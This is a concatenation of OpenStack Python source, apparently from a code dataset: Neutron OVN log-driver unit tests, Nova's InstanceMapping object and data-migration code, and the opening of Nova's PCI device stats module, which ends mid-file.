self.context = mock.Mock()
self.plugin_driver = mock.Mock()
self.plugin_driver.nb_ovn = fake_resources.FakeOvsdbNbOvnIdl()
self.log_plugin = mock.Mock()
get_mock_log_plugin = lambda alias: self.log_plugin if (
alias == plugin_constants.LOG_API) else None
self.fake_get_dir_object = mock.patch(
"neutron_lib.plugins.directory.get_plugin",
side_effect=get_mock_log_plugin).start()
self.fake_get_sgs_attached_to_port = mock.patch(
"neutron.services.logapi.common.db_api._get_sgs_attached_to_port",
return_value=[]).start()
self.fake_cfg_network_log = mock.patch(
"oslo_config.cfg.CONF.network_log").start()
self.fake_cfg_network_log.local_output_log_base = None
self.fake_cfg_network_log.rate_limit = FAKE_CFG_RATE
self.fake_cfg_network_log.burst_limit = FAKE_CFG_BURST
self._log_driver_property = None
@property
def _nb_ovn(self):
return self.plugin_driver.nb_ovn
@property
def _log_driver(self):
if self._log_driver_property is None:
self._log_driver_property = ovn_driver.OVNDriver.create(
self.plugin_driver)
return self._log_driver_property
def _log_driver_reinit(self):
self._log_driver_property = None
return self._log_driver
def _fake_meter(self, **kwargs):
meter_defaults_dict = {
'uuid': uuidutils.generate_uuid(),
'bands': [mock.Mock(uuid='test_band')],
'unit': 'pktps',
'fair': [True],
}
meter_obj_dict = {**meter_defaults_dict, **kwargs}
return mock.Mock(**meter_obj_dict)
def _fake_meter_band(self, **kwargs):
meter_band_defaults_dict = {
'uuid': 'test_band',
'rate': self.fake_cfg_network_log.rate_limit,
'burst_size': self.fake_cfg_network_log.burst_limit,
}
meter_band_obj_dict = {**meter_band_defaults_dict, **kwargs}
return mock.Mock(**meter_band_obj_dict)
def test_create(self):
driver = self._log_driver
self.assertEqual(self.log_plugin, driver._log_plugin)
self.assertEqual(self.plugin_driver, driver.plugin_driver)
self.assertEqual(self.plugin_driver.nb_ovn, driver.ovn_nb)
def test_create_meter_name(self):
driver = self._log_driver
self.assertEqual("acl_log_meter", driver.meter_name)
test_log_base = neutron_utils.get_rand_name()
self.fake_cfg_network_log.local_output_log_base = test_log_base
driver2 = self._log_driver_reinit()
self.assertEqual(test_log_base, driver2.meter_name)
def test__create_ovn_fair_meter(self):
mock_find_rows = mock.Mock()
mock_find_rows.execute.return_value = None
self._nb_ovn.db_find_rows.return_value = mock_find_rows
self._log_driver._create_ovn_fair_meter(self._nb_ovn.transaction)
self.assertFalse(self._nb_ovn.meter_del.called)
self.assertTrue(self._nb_ovn.meter_add.called)
self.assertFalse(
self._nb_ovn.transaction.return_value.__enter__.called)
self._nb_ovn.meter_add.assert_called_once_with(
name="acl_log_meter",
unit="pktps",
rate=FAKE_CFG_RATE,
fair=True,
burst_size=FAKE_CFG_BURST,
may_exist=False,
external_ids={ovn_const.OVN_DEVICE_OWNER_EXT_ID_KEY:
log_const.LOGGING_PLUGIN})
def test__create_ovn_fair_meter_unchanged(self):
mock_find_rows = mock.Mock()
mock_find_rows.execute.return_value = [self._fake_meter()]
self._nb_ovn.db_find_rows.return_value = mock_find_rows
self._nb_ovn.lookup.side_effect = lambda table, key: (
self._fake_meter_band() if key == "test_band" else None)
self._log_driver._create_ovn_fair_meter(self._nb_ovn.transaction)
self.assertFalse(self._nb_ovn.meter_del.called)
self.assertFalse(self._nb_ovn.meter_add.called)
def test__create_ovn_fair_meter_changed(self):
mock_find_rows = mock.Mock()
mock_find_rows.execute.return_value = [self._fake_meter(fair=[False])]
self._nb_ovn.db_find_rows.return_value = mock_find_rows
self._nb_ovn.lookup.return_value = self._fake_meter_band()
self._log_driver._create_ovn_fair_meter(self._nb_ovn.transaction)
self.assertTrue(self._nb_ovn.meter_del.called)
self.assertTrue(self._nb_ovn.meter_add.called)
def test__create_ovn_fair_meter_band_changed(self):
mock_find_rows = mock.Mock()
mock_find_rows.execute.return_value = [self._fake_meter()]
self._nb_ovn.db_find_rows.return_value = mock_find_rows
self._nb_ovn.lookup.return_value = self._fake_meter_band(rate=666)
self._log_driver._create_ovn_fair_meter(self._nb_ovn.transaction)
self.assertTrue(self._nb_ovn.meter_del.called)
self.assertTrue(self._nb_ovn.meter_add.called)
def test__create_ovn_fair_meter_band_missing(self):
mock_find_rows = mock.Mock()
mock_find_rows.execute.return_value = [self._fake_meter()]
self._nb_ovn.db_find_rows.return_value = mock_find_rows
self._nb_ovn.lookup.side_effect = idlutils.RowNotFound
self._log_driver._create_ovn_fair_meter(self._nb_ovn.transaction)
self.assertTrue(self._nb_ovn.meter_del.called)
self.assertTrue(self._nb_ovn.meter_add.called)
class _fake_acl():
def __init__(self, name=None, **acl_dict):
acl_defaults_dict = {
"name": [name] if name else [],
"action": ovn_const.ACL_ACTION_ALLOW_RELATED,
}
self.__dict__ = {**acl_defaults_dict, **acl_dict}
def _fake_pg_dict(self, **kwargs):
pg_defaults_dict = {
"name": ovn_utils.ovn_port_group_name(uuidutils.generate_uuid()),
"acls": []
}
return {**pg_defaults_dict, **kwargs}
def _fake_pg(self, **kwargs):
pg_defaults_dict = {
"name": ovn_utils.ovn_port_group_name(uuidutils.generate_uuid()),
"acls": []
}
pg_dict = {**pg_defaults_dict, **kwargs}
return mock.Mock(**pg_dict)
def _fake_log_obj(self, **kwargs):
log_obj_defaults_dict = {
'uuid': uuidutils.generate_uuid(),
'resource_id': None,
'target_id': None,
'event': log_const.ALL_EVENT,
}
log_obj_obj_dict = {**log_obj_defaults_dict, **kwargs}
return mock.Mock(**log_obj_obj_dict)
def test__pgs_from_log_obj_pg_all(self):
expected_pgs = [self._fake_pg()]
with mock.patch.object(self._log_driver, '_pgs_all',
return_value=expected_pgs) as mock_pgs_all:
log_obj = self._fake_log_obj()
pgs = self._log_driver._pgs_from_log_obj(self.context, log_obj)
mock_pgs_all.assert_called_once()
self.assertEqual(expected_pgs, pgs)
def test__pgs_from_log_obj_empty(self):
with mock.patch.object(self._log_driver, '_pgs_all',
return_value=[]) as mock_pgs_all:
self._nb_ovn.lookup.side_effect = idlutils.RowNotFound
log_obj = self._fake_log_obj(target_id='target_id')
pgs = self._log_driver._pgs_from_log_obj(self.context, log_obj)
mock_pgs_all.assert_not_called()
self._nb_ovn.lookup.assert_called_once_with(
"Port_Group", ovn_const.OVN_DROP_PORT_GROUP_NAME)
self.fake_get_sgs_attached_to_port.assert_called_once_with(
self.context, 'target_id')
self.assertEqual([], pgs)
def test__pgs_from_log_obj_pg_drop(self):
with mock.patch.object(self._log_driver, '_pgs_all',
return_value=[]) as mock_pgs_all:
pg = self._fake_pg()
def _mock_lookup(_pg_table, pg_name):
if pg_name == ovn_const.OVN_DROP_PORT_GROUP_NAME:
return pg
raise idlutils.RowNotFound
self._nb_ovn.lookup.side_effect = _mock_lookup
log_obj = self._fake_log_obj(resource_id='resource_id')
pgs = self._log_driver._pgs_from_log_obj(self.context, log_obj)
mock_pgs_all.assert_not_called()
self.assertEqual(2, self._nb_ovn.lookup.call_count)
self.assertEqual([{'acls': [], 'name': pg.name}], pgs)
def test__pgs_from_log_obj_pg(self):
with mock.patch.object(self._log_driver, '_pgs_all',
return_value=[]) as mock_pgs_all:
pg = self._fake_pg()
self._nb_ovn.lookup.return_value = pg
log_obj = self._fake_log_obj(resource_id='resource_id',
target_id='target_id',
event=log_const.ACCEPT_EVENT)
pgs = self._log_driver._pgs_from_log_obj(self.context, log_obj)
mock_pgs_all.assert_not_called()
self._nb_ovn.lookup.assert_called_once_with(
"Port_Group", ovn_utils.ovn_port_group_name('resource_id'))
self.assertEqual([{'acls': [], 'name': pg.name}], pgs)
def test__pgs_from_log_obj_port(self):
with mock.patch.object(self._log_driver, '_pgs_all',
return_value=[]) as mock_pgs_all:
sg_id = uuidutils.generate_uuid()
pg_name = ovn_utils.ovn_port_group_name(sg_id)
pg = self._fake_pg(name=pg_name)
self._nb_ovn.lookup.return_value = pg
log_obj = self._fake_log_obj(target_id='target_id',
event=log_const.ACCEPT_EVENT)
self.fake_get_sgs_attached_to_port.return_value = [sg_id]
pgs = self._log_driver._pgs_from_log_obj(self.context, log_obj)
mock_pgs_all.assert_not_called()
self._nb_ovn.lookup.assert_called_once_with("Port_Group", pg_name)
self.fake_get_sgs_attached_to_port.assert_called_once_with(
self.context, 'target_id')
self.assertEqual([{'acls': [], 'name': pg.name}], pgs)
@mock.patch.object(ovn_driver.LOG, 'info')
def test__remove_acls_log(self, m_info):
pg_dict = self._fake_pg_dict(acls=['acl1', 'acl2'])
self._log_driver._remove_acls_log([pg_dict], self._nb_ovn.transaction)
info_args, _info_kwargs = m_info.call_args_list[0]
self.assertIn('Cleared %d, Not found %d (out of %d visited) ACLs',
info_args[0])
self._nb_ovn.lookup.assert_has_calls([
mock.call('ACL', 'acl1', default=None),
mock.call('ACL', 'acl2', default=None)])
self.assertEqual(len(pg_dict["acls"]), info_args[1])
self.assertEqual(len(pg_dict["acls"]) - 2, info_args[2])
self.assertEqual(len(pg_dict["acls"]), info_args[3])
self.assertEqual(len(pg_dict["acls"]), self._nb_ovn.db_set.call_count)
@mock.patch.object(ovn_driver.LOG, 'info')
def test__remove_acls_log_missing_acls(self, m_info):
pg_dict = self._fake_pg_dict(acls=['acl1', 'acl2', 'acl3'])
def _mock_lookup(_pg_table, acl_uuid, default):
if acl_uuid == 'acl3':
return None
return self._fake_acl()
self._nb_ovn.lookup.side_effect = _mock_lookup
self._log_driver._remove_acls_log([pg_dict], self._nb_ovn.transaction)
info_args, _info_kwargs = m_info.call_args_list[0]
self.assertEqual(len(pg_dict["acls"]) - 1, info_args[1])
self.assertEqual(len(pg_dict["acls"]) - 2, info_args[2])
self.assertEqual(len(pg_dict["acls"]), info_args[3])
self.assertEqual(len(pg_dict["acls"]) - 1,
self._nb_ovn.db_set.call_count)
@mock.patch.object(ovn_driver.LOG, 'info')
def test__remove_acls_log_with_log_name(self, m_info):
pg_dict = self._fake_pg_dict(acls=['acl1', 'acl2', 'acl3', 'acl4'])
log_name = 'test_obj_name'
used_name = 'test_used_name'
def _mock_lookup(_pg_table, acl_uuid, default):
if acl_uuid == 'acl2':
return self._fake_acl(name=used_name)
return self._fake_acl(name=log_name)
self._nb_ovn.lookup.side_effect = _mock_lookup
self._log_driver._remove_acls_log([pg_dict], self._nb_ovn.transaction,
log_name)
info_args, _info_kwargs = m_info.call_args_list[0]
self.assertIn('Cleared %d, Not found %d (out of %d visited) ACLs',
info_args[0])
self.assertIn('for network log {}'.format(log_name), info_args[0])
self.assertEqual(len(pg_dict["acls"]) - 1, info_args[1])
self.assertEqual(len(pg_dict["acls"]) - 4, info_args[2])
self.assertEqual(len(pg_dict["acls"]), info_args[3])
self.assertEqual(len(pg_dict["acls"]) - 1,
self._nb_ovn.db_set.call_count)
@mock.patch.object(ovn_driver.LOG, 'info')
def test__set_acls_log(self, m_info):
pg_dict = self._fake_pg_dict(acls=['acl1', 'acl2', 'acl3', 'acl4'])
log_name = 'test_obj_name'
used_name = 'test_used_name'
def _mock_lookup(_pg_table, acl_uuid):
if acl_uuid == 'acl3':
return self._fake_acl()
return self._fake_acl(name=used_name)
self._nb_ovn.lookup.side_effect = _mock_lookup
actions_enabled = self._log_driver._acl_actions_enabled(
self._fake_log_obj(event=log_const.ALL_EVENT))
self._log_driver._set_acls_log([pg_dict], self._nb_ovn.transaction,
actions_enabled, log_name)
info_args, _info_kwargs = m_info.call_args_list[0]
self.assertIn('Set %d (out of %d visited) ACLs for network log %s',
info_args[0])
self.assertEqual(1, info_args[1])
self.assertEqual(len(pg_dict["acls"]), info_args[2])
self.assertEqual(log_name, info_args[3])
self.assertEqual(1, self._nb_ovn.db_set.call_count)
``` |
{
"source": "10088/nova",
"score": 2
} |
#### File: nova/objects/instance_mapping.py
```python
import collections
from oslo_log import log as logging
from oslo_utils import versionutils
from sqlalchemy import orm
from sqlalchemy.orm import exc as orm_exc
from sqlalchemy import sql
from sqlalchemy.sql import func
from nova import context as nova_context
from nova.db.api import api as api_db_api
from nova.db.api import models as api_models
from nova import exception
from nova.i18n import _
from nova import objects
from nova.objects import base
from nova.objects import cell_mapping
from nova.objects import fields
from nova.objects import virtual_interface
LOG = logging.getLogger(__name__)
@base.NovaObjectRegistry.register
class InstanceMapping(base.NovaTimestampObject, base.NovaObject):
# Version 1.0: Initial version
# Version 1.1: Add queued_for_delete
# Version 1.2: Add user_id
VERSION = '1.2'
fields = {
'id': fields.IntegerField(read_only=True),
'instance_uuid': fields.UUIDField(),
'cell_mapping': fields.ObjectField('CellMapping', nullable=True),
'project_id': fields.StringField(),
'user_id': fields.StringField(),
'queued_for_delete': fields.BooleanField(default=False),
}
def obj_make_compatible(self, primitive, target_version):
super(InstanceMapping, self).obj_make_compatible(primitive,
target_version)
target_version = versionutils.convert_version_to_tuple(target_version)
if target_version < (1, 2) and 'user_id' in primitive:
del primitive['user_id']
if target_version < (1, 1):
if 'queued_for_delete' in primitive:
del primitive['queued_for_delete']
def obj_load_attr(self, attrname):
if attrname == 'user_id':
LOG.error('The unset user_id attribute of an unmigrated instance '
'mapping should not be accessed.')
raise exception.ObjectActionError(
action='obj_load_attr',
reason=_('attribute user_id is not lazy-loadable'))
super(InstanceMapping, self).obj_load_attr(attrname)
def _update_with_cell_id(self, updates):
cell_mapping_obj = updates.pop("cell_mapping", None)
if cell_mapping_obj:
updates["cell_id"] = cell_mapping_obj.id
return updates
@staticmethod
def _from_db_object(context, instance_mapping, db_instance_mapping):
for key in instance_mapping.fields:
db_value = db_instance_mapping.get(key)
if key == 'cell_mapping':
# cell_mapping can be None indicating that the instance has
# not been scheduled yet.
if db_value:
db_value = cell_mapping.CellMapping._from_db_object(
context, cell_mapping.CellMapping(), db_value)
if key == 'user_id' and db_value is None:
# NOTE(melwitt): If user_id is NULL, we can't set the field
# because it's non-nullable. We don't plan for any code to read
# the user_id field at this time, so skip setting it.
continue
setattr(instance_mapping, key, db_value)
instance_mapping.obj_reset_changes()
instance_mapping._context = context
return instance_mapping
@staticmethod
@api_db_api.context_manager.reader
def _get_by_instance_uuid_from_db(context, instance_uuid):
db_mapping = context.session.query(api_models.InstanceMapping)\
.options(orm.joinedload(api_models.InstanceMapping.cell_mapping))\
.filter(api_models.InstanceMapping.instance_uuid == instance_uuid)\
.first()
if not db_mapping:
raise exception.InstanceMappingNotFound(uuid=instance_uuid)
return db_mapping
@base.remotable_classmethod
def get_by_instance_uuid(cls, context, instance_uuid):
db_mapping = cls._get_by_instance_uuid_from_db(context, instance_uuid)
return cls._from_db_object(context, cls(), db_mapping)
@staticmethod
@api_db_api.context_manager.writer
def _create_in_db(context, updates):
db_mapping = api_models.InstanceMapping()
db_mapping.update(updates)
db_mapping.save(context.session)
# NOTE: This is done because a later access will trigger a lazy load
# outside of the db session so it will fail. We don't lazy load
# cell_mapping on the object later because we never need an
# InstanceMapping without the CellMapping.
db_mapping.cell_mapping
return db_mapping
@base.remotable
def create(self):
changes = self.obj_get_changes()
changes = self._update_with_cell_id(changes)
if 'queued_for_delete' not in changes:
# NOTE(danms): If we are creating a mapping, it should be
# not queued_for_delete (unless we are being asked to
# create one in deleted state for some reason).
changes['queued_for_delete'] = False
db_mapping = self._create_in_db(self._context, changes)
self._from_db_object(self._context, self, db_mapping)
@staticmethod
@api_db_api.context_manager.writer
def _save_in_db(context, instance_uuid, updates):
db_mapping = context.session.query(
api_models.InstanceMapping).filter_by(
instance_uuid=instance_uuid).first()
if not db_mapping:
raise exception.InstanceMappingNotFound(uuid=instance_uuid)
db_mapping.update(updates)
# NOTE: This is done because a later access will trigger a lazy load
# outside of the db session so it will fail. We don't lazy load
# cell_mapping on the object later because we never need an
# InstanceMapping without the CellMapping.
db_mapping.cell_mapping
context.session.add(db_mapping)
return db_mapping
@base.remotable
def save(self):
changes = self.obj_get_changes()
changes = self._update_with_cell_id(changes)
try:
db_mapping = self._save_in_db(self._context, self.instance_uuid,
changes)
except orm_exc.StaleDataError:
# NOTE(melwitt): If the instance mapping has been deleted out from
# under us by conductor (delete requested while booting), we will
# encounter a StaleDataError after we retrieved the row and try to
# update it after it's been deleted. We can treat this like an
# instance mapping not found and allow the caller to handle it.
raise exception.InstanceMappingNotFound(uuid=self.instance_uuid)
self._from_db_object(self._context, self, db_mapping)
self.obj_reset_changes()
@staticmethod
@api_db_api.context_manager.writer
def _destroy_in_db(context, instance_uuid):
result = context.session.query(api_models.InstanceMapping).filter_by(
instance_uuid=instance_uuid).delete()
if not result:
raise exception.InstanceMappingNotFound(uuid=instance_uuid)
@base.remotable
def destroy(self):
self._destroy_in_db(self._context, self.instance_uuid)
@api_db_api.context_manager.writer
def populate_queued_for_delete(context, max_count):
cells = objects.CellMappingList.get_all(context)
processed = 0
for cell in cells:
ims = (
# Get a direct list of instance mappings for this cell which
# have not yet received a defined value decision for
# queued_for_delete
context.session.query(api_models.InstanceMapping)
.filter(
api_models.InstanceMapping.queued_for_delete == None) # noqa
.filter(api_models.InstanceMapping.cell_id == cell.id)
.limit(max_count).all())
ims_by_inst = {im.instance_uuid: im for im in ims}
if not ims_by_inst:
# If there is nothing from this cell to migrate, move on.
continue
with nova_context.target_cell(context, cell) as cctxt:
filters = {'uuid': list(ims_by_inst.keys()),
'deleted': True,
'soft_deleted': True}
instances = objects.InstanceList.get_by_filters(
cctxt, filters, expected_attrs=[])
# Walk through every deleted instance that has a mapping needing
# to be updated and update it
for instance in instances:
im = ims_by_inst.pop(instance.uuid)
im.queued_for_delete = True
context.session.add(im)
processed += 1
# Any instances we did not just hit must be not-deleted, so
# update the remaining mappings
for non_deleted_im in ims_by_inst.values():
non_deleted_im.queued_for_delete = False
context.session.add(non_deleted_im)
processed += 1
max_count -= len(ims)
if max_count <= 0:
break
return processed, processed
@api_db_api.context_manager.writer
def populate_user_id(context, max_count):
cells = objects.CellMappingList.get_all(context)
cms_by_id = {cell.id: cell for cell in cells}
done = 0
unmigratable_ims = False
ims = (
# Get a list of instance mappings which do not have user_id populated.
# We need to include records with queued_for_delete=True because they
# include SOFT_DELETED instances, which could be restored at any time
# in the future. If we don't migrate SOFT_DELETED instances now, we
# wouldn't be able to retire this migration code later. Also filter
# out the marker instance created by the virtual interface migration.
context.session.query(api_models.InstanceMapping)
.filter_by(user_id=None)
.filter(api_models.InstanceMapping.project_id !=
virtual_interface.FAKE_UUID)
.limit(max_count).all())
found = len(ims)
ims_by_inst_uuid = {}
inst_uuids_by_cell_id = collections.defaultdict(set)
for im in ims:
ims_by_inst_uuid[im.instance_uuid] = im
inst_uuids_by_cell_id[im.cell_id].add(im.instance_uuid)
for cell_id, inst_uuids in inst_uuids_by_cell_id.items():
# We cannot migrate instance mappings that don't have a cell yet.
if cell_id is None:
unmigratable_ims = True
continue
with nova_context.target_cell(context, cms_by_id[cell_id]) as cctxt:
# We need to migrate SOFT_DELETED instances because they could be
# restored at any time in the future, preventing us from being able
# to remove any other interim online data migration code we have,
# if we don't migrate them here.
# NOTE: it's not possible to query only for SOFT_DELETED instances.
# We must query for both deleted and SOFT_DELETED instances.
filters = {'uuid': inst_uuids}
try:
instances = objects.InstanceList.get_by_filters(
cctxt, filters, expected_attrs=[])
except Exception as exp:
LOG.warning('Encountered exception: "%s" while querying '
'instances from cell: %s. Continuing to the next '
'cell.', str(exp),
cms_by_id[cell_id].identity)
continue
# Walk through every instance that has a mapping needing to be updated
# and update it.
for instance in instances:
im = ims_by_inst_uuid.pop(instance.uuid)
im.user_id = instance.user_id
context.session.add(im)
done += 1
if ims_by_inst_uuid:
unmigratable_ims = True
if done >= max_count:
break
if unmigratable_ims:
LOG.warning('Some instance mappings were not migratable. This may '
'be transient due to in-flight instance builds, or could '
'be due to stale data that will be cleaned up after '
'running "nova-manage db archive_deleted_rows --purge".')
return found, done
@base.NovaObjectRegistry.register
class InstanceMappingList(base.ObjectListBase, base.NovaObject):
# Version 1.0: Initial version
# Version 1.1: Added get_by_cell_id method.
# Version 1.2: Added get_by_instance_uuids method
# Version 1.3: Added get_counts()
VERSION = '1.3'
fields = {
'objects': fields.ListOfObjectsField('InstanceMapping'),
}
@staticmethod
@api_db_api.context_manager.reader
def _get_by_project_id_from_db(context, project_id):
return context.session.query(api_models.InstanceMapping)\
.options(orm.joinedload(api_models.InstanceMapping.cell_mapping))\
.filter(api_models.InstanceMapping.project_id == project_id).all()
@base.remotable_classmethod
def get_by_project_id(cls, context, project_id):
db_mappings = cls._get_by_project_id_from_db(context, project_id)
return base.obj_make_list(context, cls(), objects.InstanceMapping,
db_mappings)
@staticmethod
@api_db_api.context_manager.reader
def _get_by_cell_id_from_db(context, cell_id):
return context.session.query(api_models.InstanceMapping)\
.options(orm.joinedload(api_models.InstanceMapping.cell_mapping))\
.filter(api_models.InstanceMapping.cell_id == cell_id).all()
@base.remotable_classmethod
def get_by_cell_id(cls, context, cell_id):
db_mappings = cls._get_by_cell_id_from_db(context, cell_id)
return base.obj_make_list(context, cls(), objects.InstanceMapping,
db_mappings)
@staticmethod
@api_db_api.context_manager.reader
def _get_by_instance_uuids_from_db(context, uuids):
return context.session.query(api_models.InstanceMapping)\
.options(orm.joinedload(api_models.InstanceMapping.cell_mapping))\
.filter(api_models.InstanceMapping.instance_uuid.in_(uuids))\
.all()
@base.remotable_classmethod
def get_by_instance_uuids(cls, context, uuids):
db_mappings = cls._get_by_instance_uuids_from_db(context, uuids)
return base.obj_make_list(context, cls(), objects.InstanceMapping,
db_mappings)
@staticmethod
@api_db_api.context_manager.writer
def _destroy_bulk_in_db(context, instance_uuids):
return context.session.query(api_models.InstanceMapping).filter(
api_models.InstanceMapping.instance_uuid.in_(instance_uuids)).\
delete(synchronize_session=False)
@classmethod
def destroy_bulk(cls, context, instance_uuids):
return cls._destroy_bulk_in_db(context, instance_uuids)
@staticmethod
@api_db_api.context_manager.reader
def _get_not_deleted_by_cell_and_project_from_db(context, cell_uuid,
project_id, limit):
query = context.session.query(api_models.InstanceMapping)
if project_id is not None:
# Note that the project_id can be None in case
# instances are being listed for the all-tenants case.
query = query.filter_by(project_id=project_id)
# Both the values NULL (for cases when the online data migration for
# queued_for_delete was not run) and False (cases when the online
# data migration for queued_for_delete was run) are assumed to mean
# that the instance is not queued for deletion.
query = query.filter(
sql.or_(
api_models.InstanceMapping.queued_for_delete == sql.false(),
api_models.InstanceMapping.queued_for_delete.is_(None)
)
).join(
api_models.InstanceMapping.cell_mapping
).options(
orm.joinedload(api_models.InstanceMapping.cell_mapping)
).filter(api_models.CellMapping.uuid == cell_uuid)
if limit is not None:
query = query.limit(limit)
return query.all()
@classmethod
def get_not_deleted_by_cell_and_project(cls, context, cell_uuid,
project_id, limit=None):
"""Return a limit restricted list of InstanceMapping objects which are
mapped to the specified cell_uuid, belong to the specified
project_id and are not queued for deletion (note that unlike the other
InstanceMappingList query methods which return all mappings
irrespective of whether they are queued for deletion this method
explicitly queries only for those mappings that are *not* queued for
deletion as is evident from the naming of the method).
"""
db_mappings = cls._get_not_deleted_by_cell_and_project_from_db(
context, cell_uuid, project_id, limit)
return base.obj_make_list(context, cls(), objects.InstanceMapping,
db_mappings)
@staticmethod
@api_db_api.context_manager.reader
def _get_counts_in_db(context, project_id, user_id=None):
project_query = context.session.query(
func.count(api_models.InstanceMapping.id)).\
filter_by(queued_for_delete=False).\
filter_by(project_id=project_id)
project_result = project_query.scalar()
counts = {'project': {'instances': project_result}}
if user_id:
user_result = project_query.filter_by(user_id=user_id).scalar()
counts['user'] = {'instances': user_result}
return counts
@base.remotable_classmethod
def get_counts(cls, context, project_id, user_id=None):
"""Get the counts of InstanceMapping objects in the database.
The count is used to represent the count of instances for the purpose
of counting quota usage. Instances that are queued_for_deleted=True are
not included in the count (deleted and SOFT_DELETED instances).
Instances that are queued_for_deleted=None are not included in the
count because we are not certain about whether or not they are deleted.
:param context: The request context for database access
:param project_id: The project_id to count across
:param user_id: The user_id to count across
:returns: A dict containing the project-scoped counts and user-scoped
counts if user_id is specified. For example:
{'project': {'instances': <count across project>},
'user': {'instances': <count across user>}}
"""
return cls._get_counts_in_db(context, project_id, user_id=user_id)
@staticmethod
@api_db_api.context_manager.reader
def _get_count_by_uuids_and_user_in_db(context, uuids, user_id):
query = (context.session.query(
func.count(api_models.InstanceMapping.id))
.filter(api_models.InstanceMapping.instance_uuid.in_(uuids))
.filter_by(queued_for_delete=False)
.filter_by(user_id=user_id))
return query.scalar()
@classmethod
def get_count_by_uuids_and_user(cls, context, uuids, user_id):
"""Get the count of InstanceMapping objects by UUIDs and user_id.
The count is used to represent the count of server group members
belonging to a particular user, for the purpose of counting quota
usage. Instances that are queued_for_deleted=True are not included in
the count (deleted and SOFT_DELETED instances).
:param uuids: List of instance UUIDs on which to filter
:param user_id: The user_id on which to filter
:returns: An integer for the count
"""
return cls._get_count_by_uuids_and_user_in_db(context, uuids, user_id)
```
#### File: nova/pci/stats.py
```python
import copy
import typing as ty
from oslo_config import cfg
from oslo_log import log as logging
from oslo_utils import strutils
from nova import exception
from nova import objects
from nova.objects import fields
from nova.objects import pci_device_pool
from nova.pci.request import PCI_REMOTE_MANAGED_TAG
from nova.pci import utils
from nova.pci import whitelist
CONF = cfg.CONF
LOG = logging.getLogger(__name__)
# TODO(stephenfin): We might want to use TypedDict here. Refer to
# https://mypy.readthedocs.io/en/latest/kinds_of_types.html#typeddict for
# more information.
Pool = ty.Dict[str, ty.Any]
class PciDeviceStats(object):
"""PCI devices summary information.
According to the PCI SR-IOV spec, a PCI physical function can have up to
256 PCI virtual functions, thus the number of assignable PCI functions in
a cloud can be big. The scheduler needs to know all device availability
information in order to determine which compute hosts can support a PCI
request. Passing individual virtual device information to the scheduler
does not scale, so we provide summary information.
Usually the virtual functions provided by a host PCI device have the same
value for most properties, like vendor_id, product_id and class type.
The PCI stats class summarizes this information for the scheduler.
The pci stats information is maintained exclusively by compute node
resource tracker and updated to database. The scheduler fetches the
information and selects the compute node accordingly. If a compute
node is selected, the resource tracker allocates the devices to the
instance and updates the pci stats information.
This summary information will be helpful for cloud management also.
"""
pool_keys = ['product_id', 'vendor_id', 'numa_node', 'dev_type']
def __init__(
self,
numa_topology: 'objects.NUMATopology',
stats: 'objects.PCIDevicePoolList' = None,
dev_filter: whitelist.Whitelist = None,
) -> None:
self.numa_topology = numa_topology
self.pools = (
[pci_pool.to_dict() for pci_pool in stats] if stats else []
)
self.pools.sort(key=lambda item: len(item))
self.dev_filter = dev_filter or whitelist.Whitelist(
CONF.pci.passthrough_whitelist)
def _equal_properties(
self, dev: Pool, entry: Pool, matching_keys: ty.List[str],
) -> bool:
return all(dev.get(prop) == entry.get(prop)
for prop in matching_keys)
def _find_pool(self, dev_pool: Pool) -> ty.Optional[Pool]:
"""Return the first pool that matches dev."""
for pool in self.pools:
pool_keys = pool.copy()
del pool_keys['count']
del pool_keys['devices']
if (len(pool_keys.keys()) == len(dev_pool.keys()) and
self._equal_properties(dev_pool, pool_keys, list(dev_pool))):
return pool
return None
@staticmethod
def _ensure_remote_managed_tag(
dev: 'objects.PciDevice', pool: Pool):
"""Add a remote_managed tag depending on a device type if needed.
Network devices may be managed remotely, e.g. by a SmartNIC DPU. If
a tag has not been explicitly provided, populate it by assuming that
a device is not remote managed by default.
"""
if dev.dev_type not in (fields.PciDeviceType.SRIOV_VF,
fields.PciDeviceType.SRIOV_PF,
fields.PciDeviceType.VDPA):
return
# A tag is added here rather than at the client side to avoid an
# issue with having objects without this tag specified during an
# upgrade to the first version that supports handling this tag.
if pool.get(PCI_REMOTE_MANAGED_TAG) is None:
# NOTE: tags are compared as strings case-insensitively, see
# pci_device_prop_match in nova/pci/utils.py.
pool[PCI_REMOTE_MANAGED_TAG] = 'false'
def _create_pool_keys_from_dev(
self, dev: 'objects.PciDevice',
) -> ty.Optional[Pool]:
"""Create a stats pool dict that this dev is supposed to be part of
Note that this pool dict contains the stats pool's keys and their
values. 'count' and 'devices' are not included.
"""
# Don't add a device that doesn't have a matching device spec.
# This can happen during initial sync up with the controller
devspec = self.dev_filter.get_devspec(dev)
if not devspec:
return None
tags = devspec.get_tags()
pool = {k: getattr(dev, k) for k in self.pool_keys}
if tags:
pool.update(tags)
# NOTE(gibi): parent_ifname acts like a tag during pci claim but
# not provided as part of the whitelist spec as it is auto detected
# by the virt driver.
# This key is used for match InstancePciRequest backed by neutron ports
# that has resource_request and therefore that has resource allocation
# already in placement.
if dev.extra_info.get('parent_ifname'):
pool['parent_ifname'] = dev.extra_info['parent_ifname']
self._ensure_remote_managed_tag(dev, pool)
return pool
def _get_pool_with_device_type_mismatch(
self, dev: 'objects.PciDevice',
) -> ty.Optional[ty.Tuple[Pool, 'objects.PciDevice']]:
"""Check for device type mismatch in the pools for a given device.
Return (pool, device) if device type does not match or a single None
if the device type matches.
"""
for pool in self.pools:
for device in pool['devices']:
if device.address == dev.address:
if dev.dev_type != pool["dev_type"]:
return pool, device
return None
return None
def update_device(self, dev: 'objects.PciDevice') -> None:
"""Update a device to its matching pool."""
pool_device_info = self._get_pool_with_device_type_mismatch(dev)
if pool_device_info is None:
return None
pool, device = pool_device_info
pool['devices'].remove(device)
self._decrease_pool_count(self.pools, pool)
self.add_device(dev)
def add_device(self, dev: 'objects.PciDevice') -> None:
"""Add a device to its matching pool."""
dev_pool = self._create_pool_keys_from_dev(dev)
if dev_pool:
pool = self._find_pool(dev_pool)
if not pool:
dev_pool['count'] = 0
dev_pool['devices'] = []
self.pools.append(dev_pool)
self.pools.sort(key=lambda item: len(item))
pool = dev_pool
pool['count'] += 1
pool['devices'].append(dev)
@staticmethod
def _decrease_pool_count(
pool_list: ty.List[Pool], pool: Pool, count: int = 1,
) -> int:
"""Decrement pool's size by count.
If pool becomes empty, remove pool from pool_list.
"""
if pool['count'] > count:
pool['count'] -= count
count = 0
else:
count -= pool['count']
pool_list.remove(pool)
return count
def remove_device(self, dev: 'objects.PciDevice') -> None:
"""Remove one device from the first pool that it matches."""
